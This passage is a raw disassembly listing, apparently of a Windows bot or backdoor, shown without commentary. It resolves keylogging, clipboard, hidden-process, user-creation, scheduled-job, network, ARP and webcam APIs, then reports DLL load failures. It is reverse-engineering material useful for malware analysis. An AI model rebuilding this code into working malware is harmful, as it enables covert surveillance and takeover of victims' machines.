push eax
loc_40884D: ; CODE XREF: sub_4085A9+29B�j
lea eax, [ebp+var_2DC]
push eax
call sub_419FB0
pop ecx
pop ecx
loc_40885B: ; CODE XREF: sub_4085A9+12E�j
; sub_4085A9+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_439914
jl loc_408693
cmp [ebp+var_4], 0
jz loc_408604
push [ebp+var_D8]
call sub_416507
pop ecx
push 0
call ds:dword_4942FC
sub_4085A9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40888A proc near ; CODE XREF: sub_40BBCB+4B�p
push ebx
push ebp
mov ebp, ds:dword_494380
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp
mov esi, ds:dword_494348
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4089AA
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_44B76C, eax
call esi
push offset aProcess32first ; "Process32First"
push edi
mov dword_44B6E0, eax
call esi
push offset aProcess32next ; "Process32Next"
push edi
mov dword_44B6C4, eax
call esi
push offset aModule32first ; "Module32First"
push edi
mov dword_44B5E0, eax
call esi
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_44B58C, eax
call esi
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_44B5BC, eax
call esi
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_44B630, eax
call esi
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_44B720, eax
call esi
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_44B77C, eax
call esi
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_44B5EC, eax
call esi
cmp dword_44B76C, ebx
mov dword_44B5D4, eax
jz short loc_408988
cmp dword_44B6E0, ebx
jz short loc_408988
cmp dword_44B6C4, ebx
jz short loc_408988
cmp dword_44B5E0, ebx
jz short loc_408988
cmp dword_44B5BC, ebx
jz short loc_408988
cmp dword_44B630, ebx
jz short loc_408988
cmp dword_44B720, ebx
jz short loc_408988
cmp dword_44B77C, ebx
jz short loc_408988
cmp dword_44B5EC, ebx
jz short loc_408988
cmp eax, ebx
jnz short loc_408992
loc_408988: ; CODE XREF: sub_40888A+B8�j
; sub_40888A+C0�j ...
mov dword_44B780, 1
loc_408992: ; CODE XREF: sub_40888A+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi
cmp eax, ebx
mov dword_44B6F8, eax
jz short loc_4089BF
push 1
push ebx
call eax
jmp short loc_4089BF
; ---------------------------------------------------------------------------
loc_4089AA: ; CODE XREF: sub_40888A+1D�j
call ds:dword_4942F0
mov dword_44B784, eax
mov dword_44B780, 1
loc_4089BF: ; CODE XREF: sub_40888A+117�j
; sub_40888A+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_49434C
mov edi, eax
cmp edi, ebx
jz loc_408AD4
push offset aSendmessagea ; "SendMessageA"
push edi
call esi
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_44B71C, eax
call esi
push offset aIswindow ; "IsWindow"
push edi
mov dword_44B6CC, eax
call esi
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_44B660, eax
call esi
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_44B770, eax
call esi
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_44B690, eax
call esi
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_44B6B0, eax
call esi
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_44B714, eax
call esi
cmp dword_44B71C, ebx
mov dword_44B608, eax
jz short loc_408A78
cmp dword_44B6CC, ebx
jz short loc_408A78
cmp dword_44B660, ebx
jz short loc_408A78
cmp dword_44B770, ebx
jz short loc_408A78
cmp dword_44B690, ebx
jz short loc_408A78
cmp dword_44B6B0, ebx
jz short loc_408A78
cmp dword_44B714, ebx
jz short loc_408A78
cmp eax, ebx
jnz short loc_408A82
loc_408A78: ; CODE XREF: sub_40888A+1B8�j
; sub_40888A+1C0�j ...
mov dword_44B788, 1
loc_408A82: ; CODE XREF: sub_40888A+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_44B68C, eax
call esi
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_44B5A0, eax
call esi
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_44B65C, eax
call esi
cmp dword_44B68C, ebx
mov dword_44B648, eax
jz short loc_408ADF
cmp dword_44B5A0, ebx
jz short loc_408ADF
cmp dword_44B65C, ebx
jz short loc_408ADF
cmp eax, ebx
jnz short loc_408AE9
jmp short loc_408ADF
; ---------------------------------------------------------------------------
loc_408AD4: ; CODE XREF: sub_40888A+144�j
call ds:dword_4942F0
mov dword_44B78C, eax
loc_408ADF: ; CODE XREF: sub_40888A+232�j
; sub_40888A+23A�j ...
mov dword_44B788, 1
loc_408AE9: ; CODE XREF: sub_40888A+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_408C84
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_44B730, eax
call esi
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_44B674, eax
call esi
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_44B6E4, eax
call esi
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_44B5CC, eax
call esi
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_44B62C, eax
call esi
cmp dword_44B730, ebx
mov dword_44B69C, eax
jz short loc_408B74
cmp dword_44B674, ebx
jz short loc_408B74
cmp dword_44B6E4, ebx
jz short loc_408B74
cmp dword_44B5CC, ebx
jz short loc_408B74
cmp dword_44B62C, ebx
jz short loc_408B74
cmp eax, ebx
jnz short loc_408B7E
loc_408B74: ; CODE XREF: sub_40888A+2C4�j
; sub_40888A+2CC�j ...
mov dword_44B790, 1
loc_408B7E: ; CODE XREF: sub_40888A+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_44B6A4, eax
call esi
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_44B67C, eax
call esi
cmp dword_44B6A4, ebx
mov dword_44B72C, eax
jz short loc_408BB9
cmp dword_44B67C, ebx
jz short loc_408BB9
cmp eax, ebx
jnz short loc_408BC3
loc_408BB9: ; CODE XREF: sub_40888A+321�j
; sub_40888A+329�j
mov dword_44B790, 1
loc_408BC3: ; CODE XREF: sub_40888A+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_44B6B4, eax
call esi
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_44B5A8, eax
call esi
push offset aControlservice ; "ControlService"
push edi
mov dword_44B5B0, eax
call esi
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_44B610, eax
call esi
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_44B614, eax
call esi
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_44B5C4, eax
call esi
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_44B680, eax
call esi
cmp dword_44B6B4, ebx
mov dword_44B5B4, eax
jz short loc_408C67
cmp dword_44B5A8, ebx
jz short loc_408C67
cmp dword_44B5B0, ebx
jz short loc_408C67
cmp dword_44B610, ebx
jz short loc_408C67
cmp dword_44B614, ebx
jz short loc_408C67
cmp dword_44B5C4, ebx
jz short loc_408C67
cmp dword_44B680, ebx
jz short loc_408C67
cmp eax, ebx
jnz short loc_408C71
loc_408C67: ; CODE XREF: sub_40888A+3A7�j
; sub_40888A+3AF�j ...
mov dword_44B790, 1
loc_408C71: ; CODE XREF: sub_40888A+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi
cmp eax, ebx
mov dword_44B5AC, eax
jnz short loc_408C99
jmp short loc_408C8F
; ---------------------------------------------------------------------------
loc_408C84: ; CODE XREF: sub_40888A+26A�j
call ds:dword_4942F0
mov dword_44B794, eax
loc_408C8F: ; CODE XREF: sub_40888A+3F8�j
mov dword_44B790, 1
loc_408C99: ; CODE XREF: sub_40888A+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_408D65
push offset aCreatedca ; "CreateDCA"
push edi
call esi
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_44B6AC, eax
call esi
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_44B704, eax
call esi
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_44B70C, eax
call esi
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_44B6C8, eax
call esi
push offset aSelectobject ; "SelectObject"
push edi
mov dword_44B5F0, eax
call esi
push offset aBitblt ; "BitBlt"
push edi
mov dword_44B59C, eax
call esi
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_44B708, eax
call esi
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_44B588, eax
call esi
cmp dword_44B6AC, ebx
mov dword_44B624, eax
jz short loc_408D70
cmp dword_44B704, ebx
jz short loc_408D70
cmp dword_44B70C, ebx
jz short loc_408D70
cmp dword_44B6C8, ebx
jz short loc_408D70
cmp dword_44B5F0, ebx
jz short loc_408D70
cmp dword_44B59C, ebx
jz short loc_408D70
cmp dword_44B708, ebx
jz short loc_408D70
cmp dword_44B588, ebx
jz short loc_408D70
cmp eax, ebx
jnz short loc_408D7A
jmp short loc_408D70
; ---------------------------------------------------------------------------
loc_408D65: ; CODE XREF: sub_40888A+41A�j
call ds:dword_4942F0
mov dword_44B79C, eax
loc_408D70: ; CODE XREF: sub_40888A+49B�j
; sub_40888A+4A3�j ...
mov dword_44B798, 1
loc_408D7A: ; CODE XREF: sub_40888A+4D7�j
mov ebp, ds:dword_49434C
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_409036
push offset aWsastartup ; "WSAStartup"
push edi
call esi
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_44B638, eax
call esi
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_44B764, eax
call esi
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_44B5DC, eax
call esi
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_44B5B8, eax
call esi
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_44B66C, eax
call esi
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_44B654, eax
call esi
push offset aSocket ; "socket"
push edi
mov dword_44B620, eax
call esi
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_44B740, eax
call esi
push offset aConnect ; "connect"
push edi
mov dword_44B75C, eax
call esi
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_44B668, eax
call esi
push offset aInet_addr ; "inet_addr"
push edi
mov dword_44B74C, eax
call esi
push offset aHtons ; "htons"
push edi
mov dword_44B700, eax
call esi
push offset aHtonl ; "htonl"
push edi
mov dword_44B6C0, eax
call esi
push offset aNtohs ; "ntohs"
push edi
mov dword_44B6BC, eax
call esi
push offset aNtohl ; "ntohl"
push edi
mov dword_44B5FC, eax
call esi
push offset aSend ; "send"
push edi
mov dword_44B5F4, eax
call esi
push offset aSendto ; "sendto"
push edi
mov dword_44B710, eax
call esi
push offset aRecv ; "recv"
push edi
mov dword_44B724, eax
call esi
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_44B6D8, eax
call esi
mov dword_44B698, eax
push offset aBind ; "bind"
push edi
call esi
push offset aSelect ; "select"
push edi
mov dword_44B6EC, eax
call esi
push offset aListen ; "listen"
push edi
mov dword_44B6A8, eax
call esi
push offset aAccept ; "accept"
push edi
mov dword_44B6E8, eax
call esi
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_44B754, eax
call esi
push offset aGetsockname ; "getsockname"
push edi
mov dword_44B6A0, eax
call esi
push offset aGethostname ; "gethostname"
push edi
mov dword_44B664, eax
call esi
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_44B6D4, eax
call esi
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_44B744, eax
call esi
push offset aGetpeername ; "getpeername"
push edi
mov dword_44B678, eax
call esi
push offset aClosesocket ; "closesocket"
push edi
mov dword_44B61C, eax
call esi
cmp dword_44B638, ebx
mov dword_44B758, eax
jz loc_409041
cmp dword_44B764, ebx
jz loc_409041
cmp dword_44B5DC, ebx
jz loc_409041
cmp dword_44B66C, ebx
jz loc_409041
cmp dword_44B654, ebx
jz loc_409041
cmp dword_44B620, ebx
jz loc_409041
cmp dword_44B740, ebx
jz loc_409041
cmp dword_44B75C, ebx
jz loc_409041
cmp dword_44B668, ebx
jz loc_409041
cmp dword_44B74C, ebx
jz loc_409041
cmp dword_44B700, ebx
jz loc_409041
cmp dword_44B6C0, ebx
jz loc_409041
cmp dword_44B6BC, ebx
jz loc_409041
cmp dword_44B5FC, ebx
jz short loc_409041
cmp dword_44B710, ebx
jz short loc_409041
cmp dword_44B724, ebx
jz short loc_409041
cmp dword_44B6D8, ebx
jz short loc_409041
cmp dword_44B698, ebx
jz short loc_409041
cmp dword_44B6EC, ebx
jz short loc_409041
cmp dword_44B6A8, ebx
jz short loc_409041
cmp dword_44B6E8, ebx
jz short loc_409041
cmp dword_44B754, ebx
jz short loc_409041
cmp dword_44B6A0, ebx
jz short loc_409041
cmp dword_44B664, ebx
jz short loc_409041
cmp dword_44B6D4, ebx
jz short loc_409041
cmp dword_44B744, ebx
jz short loc_409041
cmp dword_44B678, ebx
jz short loc_409041
cmp eax, ebx
jnz short loc_40904B
jmp short loc_409041
; ---------------------------------------------------------------------------
loc_409036: ; CODE XREF: sub_40888A+501�j
call ds:dword_4942F0
mov dword_44B7A4, eax
loc_409041: ; CODE XREF: sub_40888A+6A0�j
; sub_40888A+6AC�j ...
mov dword_44B7A0, 1
loc_40904B: ; CODE XREF: sub_40888A+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_409150
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_44B604, eax
call esi
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_44B590, eax
call esi
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_44B688, eax
call esi
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_44B63C, eax
call esi
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_44B694, eax
call esi
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_44B658, eax
call esi
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_44B5D0, eax
call esi
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_44B5C8, eax
call esi
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_44B5D8, eax
call esi
cmp dword_44B604, ebx
mov ecx, dword_44B658
mov dword_44B6F4, eax
jz short loc_40912C
cmp dword_44B590, ebx
jz short loc_40912C
cmp dword_44B688, ebx
jz short loc_40912C
cmp dword_44B63C, ebx
jz short loc_40912C
cmp dword_44B694, ebx
jz short loc_40912C
cmp ecx, ebx
jz short loc_40912C
cmp dword_44B5D0, ebx
jz short loc_40912C
cmp dword_44B5C8, ebx
jz short loc_40912C
cmp dword_44B5D8, ebx
jz short loc_40912C
cmp eax, ebx
jnz short loc_409136
loc_40912C: ; CODE XREF: sub_40888A+860�j
; sub_40888A+868�j ...
mov dword_44B7A8, 1
loc_409136: ; CODE XREF: sub_40888A+8A0�j
cmp ecx, ebx
jz short loc_40916B
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_44B670, eax
jnz short loc_40916B
jmp short loc_409165
; ---------------------------------------------------------------------------
loc_409150: ; CODE XREF: sub_40888A+7CC�j
call ds:dword_4942F0
mov dword_44B7AC, eax
mov dword_44B7A8, 1
loc_409165: ; CODE XREF: sub_40888A+8C4�j
mov dword_44B670, ebx
loc_40916B: ; CODE XREF: sub_40888A+8AE�j
; sub_40888A+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4091B5
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_44B64C, eax
call esi
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_44B778, eax
call esi
cmp dword_44B64C, ebx
mov dword_44B5E4, eax
jz short loc_4091C0
cmp dword_44B778, ebx
jz short loc_4091C0
cmp eax, ebx
jnz short loc_4091CA
jmp short loc_4091C0
; ---------------------------------------------------------------------------
loc_4091B5: ; CODE XREF: sub_40888A+8EC�j
call ds:dword_4942F0
mov dword_44B7B4, eax
loc_4091C0: ; CODE XREF: sub_40888A+91B�j
; sub_40888A+923�j ...
mov dword_44B7B0, 1
loc_4091CA: ; CODE XREF: sub_40888A+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz loc_4092C0
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_44B5C0, eax
call esi
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_44B598, eax
call esi
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_44B60C, eax
call esi
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_44B640, eax
call esi
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_44B750, eax
call esi
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_44B5F8, eax
call esi
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_44B5A4, eax
call esi
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_44B594, eax
call esi
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_44B628, eax
call esi
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_44B718, eax
call esi
cmp dword_44B5C0, ebx
mov dword_44B6D0, eax
jz short loc_4092CB
cmp dword_44B598, ebx
jz short loc_4092CB
cmp dword_44B60C, ebx
jz short loc_4092CB
cmp dword_44B640, ebx
jz short loc_4092CB
cmp dword_44B750, ebx
jz short loc_4092CB
cmp dword_44B5F8, ebx
jz short loc_4092CB
cmp dword_44B5A4, ebx
jz short loc_4092CB
cmp dword_44B594, ebx
jz short loc_4092CB
cmp dword_44B628, ebx
jz short loc_4092CB
cmp dword_44B718, ebx
jz short loc_4092CB
cmp eax, ebx
jnz short loc_4092D5
jmp short loc_4092CB
; ---------------------------------------------------------------------------
loc_4092C0: ; CODE XREF: sub_40888A+94B�j
call ds:dword_4942F0
mov dword_44B7BC, eax
loc_4092CB: ; CODE XREF: sub_40888A+9E6�j
; sub_40888A+9EE�j ...
mov dword_44B7B8, 1
loc_4092D5: ; CODE XREF: sub_40888A+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_40930A
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_44B5E8, eax
call esi
cmp dword_44B5E8, ebx
mov dword_44B6B8, eax
jz short loc_409315
cmp eax, ebx
jnz short loc_40931F
jmp short loc_409315
; ---------------------------------------------------------------------------
loc_40930A: ; CODE XREF: sub_40888A+A56�j
call ds:dword_4942F0
mov dword_44B7C4, eax
loc_409315: ; CODE XREF: sub_40888A+A78�j
; sub_40888A+A7E�j
mov dword_44B7C0, 1
loc_40931F: ; CODE XREF: sub_40888A+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_409354
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_44B73C, eax
call esi
cmp dword_44B73C, ebx
mov dword_44B738, eax
jz short loc_40935F
cmp eax, ebx
jnz short loc_409369
jmp short loc_40935F
; ---------------------------------------------------------------------------
loc_409354: ; CODE XREF: sub_40888A+AA0�j
call ds:dword_4942F0
mov dword_44B7CC, eax
loc_40935F: ; CODE XREF: sub_40888A+AC2�j
; sub_40888A+AC8�j
mov dword_44B7C8, 1
loc_409369: ; CODE XREF: sub_40888A+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4093C8
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_44B768, eax
call esi
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_44B760, eax
call esi
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_44B728, eax
call esi
cmp dword_44B768, ebx
mov dword_44B600, eax
jz short loc_4093D3
cmp dword_44B760, ebx
jz short loc_4093D3
cmp dword_44B728, ebx
jz short loc_4093D3
cmp eax, ebx
jnz short loc_4093DD
jmp short loc_4093D3
; ---------------------------------------------------------------------------
loc_4093C8: ; CODE XREF: sub_40888A+AEA�j
call ds:dword_4942F0
mov dword_44B7D4, eax
loc_4093D3: ; CODE XREF: sub_40888A+B26�j
; sub_40888A+B2E�j ...
mov dword_44B7D0, 1
loc_4093DD: ; CODE XREF: sub_40888A+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_409412
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_44B634, eax
call esi
cmp dword_44B634, ebx
mov dword_44B734, eax
jz short loc_40941D
cmp eax, ebx
jnz short loc_409427
jmp short loc_40941D
; ---------------------------------------------------------------------------
loc_409412: ; CODE XREF: sub_40888A+B5E�j
call ds:dword_4942F0
mov dword_44B7DC, eax
loc_40941D: ; CODE XREF: sub_40888A+B80�j
; sub_40888A+B86�j
mov dword_44B7D8, 1
loc_409427: ; CODE XREF: sub_40888A+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4094B0
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_44B6FC, eax
call esi
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_44B748, eax
call esi
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_44B684, eax
call esi
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_44B644, eax
call esi
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_44B6DC, eax
call esi
cmp dword_44B6FC, ebx
mov dword_44B650, eax
jz short loc_4094BB
cmp dword_44B748, ebx
jz short loc_4094BB
cmp dword_44B684, ebx
jz short loc_4094BB
cmp dword_44B644, ebx
jz short loc_4094BB
cmp dword_44B6DC, ebx
jz short loc_4094BB
cmp eax, ebx
jnz short loc_4094C5
jmp short loc_4094BB
; ---------------------------------------------------------------------------
loc_4094B0: ; CODE XREF: sub_40888A+BA8�j
call ds:dword_4942F0
mov dword_44B7E4, eax
loc_4094BB: ; CODE XREF: sub_40888A+BFE�j
; sub_40888A+C06�j ...
mov dword_44B7E0, 1
loc_4094C5: ; CODE XREF: sub_40888A+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp
mov edi, eax
cmp edi, ebx
jz short loc_4094FA
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_44B618, eax
call esi
cmp dword_44B618, ebx
mov dword_44B6F0, eax
jz short loc_409505
cmp eax, ebx
jnz short loc_40950F
jmp short loc_409505
; ---------------------------------------------------------------------------
loc_4094FA: ; CODE XREF: sub_40888A+C46�j
call ds:dword_4942F0
mov dword_44B7EC, eax
loc_409505: ; CODE XREF: sub_40888A+C68�j
; sub_40888A+C6E�j
mov dword_44B7E8, 1
loc_40950F: ; CODE XREF: sub_40888A+C6C�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40888A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409517 proc near ; CODE XREF: sub_40C50A+57AF�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_44B780, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40955F
push dword_44B784
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_40955F: ; CODE XREF: sub_409517+1A�j
cmp dword_44B788, esi
jz short loc_409593
push dword_44B78C
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_409593: ; CODE XREF: sub_409517+4E�j
cmp dword_44B790, esi
jz short loc_4095C7
push dword_44B794
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_4095C7: ; CODE XREF: sub_409517+82�j
cmp dword_44B798, esi
jz short loc_4095FB
push dword_44B79C
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_4095FB: ; CODE XREF: sub_409517+B6�j
cmp dword_44B7A0, esi
jz short loc_40962F
push dword_44B7A4
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_40962F: ; CODE XREF: sub_409517+EA�j
cmp dword_44B7A8, esi
jz short loc_409663
push dword_44B7AC
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_409663: ; CODE XREF: sub_409517+11E�j
cmp dword_44B7B0, esi
jz short loc_409697
push dword_44B7B4
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_409697: ; CODE XREF: sub_409517+152�j
cmp dword_44B7B8, esi
jz short loc_4096CB
push dword_44B7BC
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_4096CB: ; CODE XREF: sub_409517+186�j
cmp dword_44B7C0, esi
jz short loc_4096FF
push dword_44B7C4
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_4096FF: ; CODE XREF: sub_409517+1BA�j
cmp dword_44B7C8, esi
jz short loc_409733
push dword_44B7CC
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_409733: ; CODE XREF: sub_409517+1EE�j
cmp dword_44B7D0, esi
jz short loc_409767
push dword_44B7D4
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_409767: ; CODE XREF: sub_409517+222�j
cmp dword_44B7D8, esi
jz short loc_40979B
push dword_44B7DC
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_40979B: ; CODE XREF: sub_409517+256�j
cmp dword_44B7E0, esi
jz short loc_4097CF
push dword_44B7E4
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_418D70
push esi
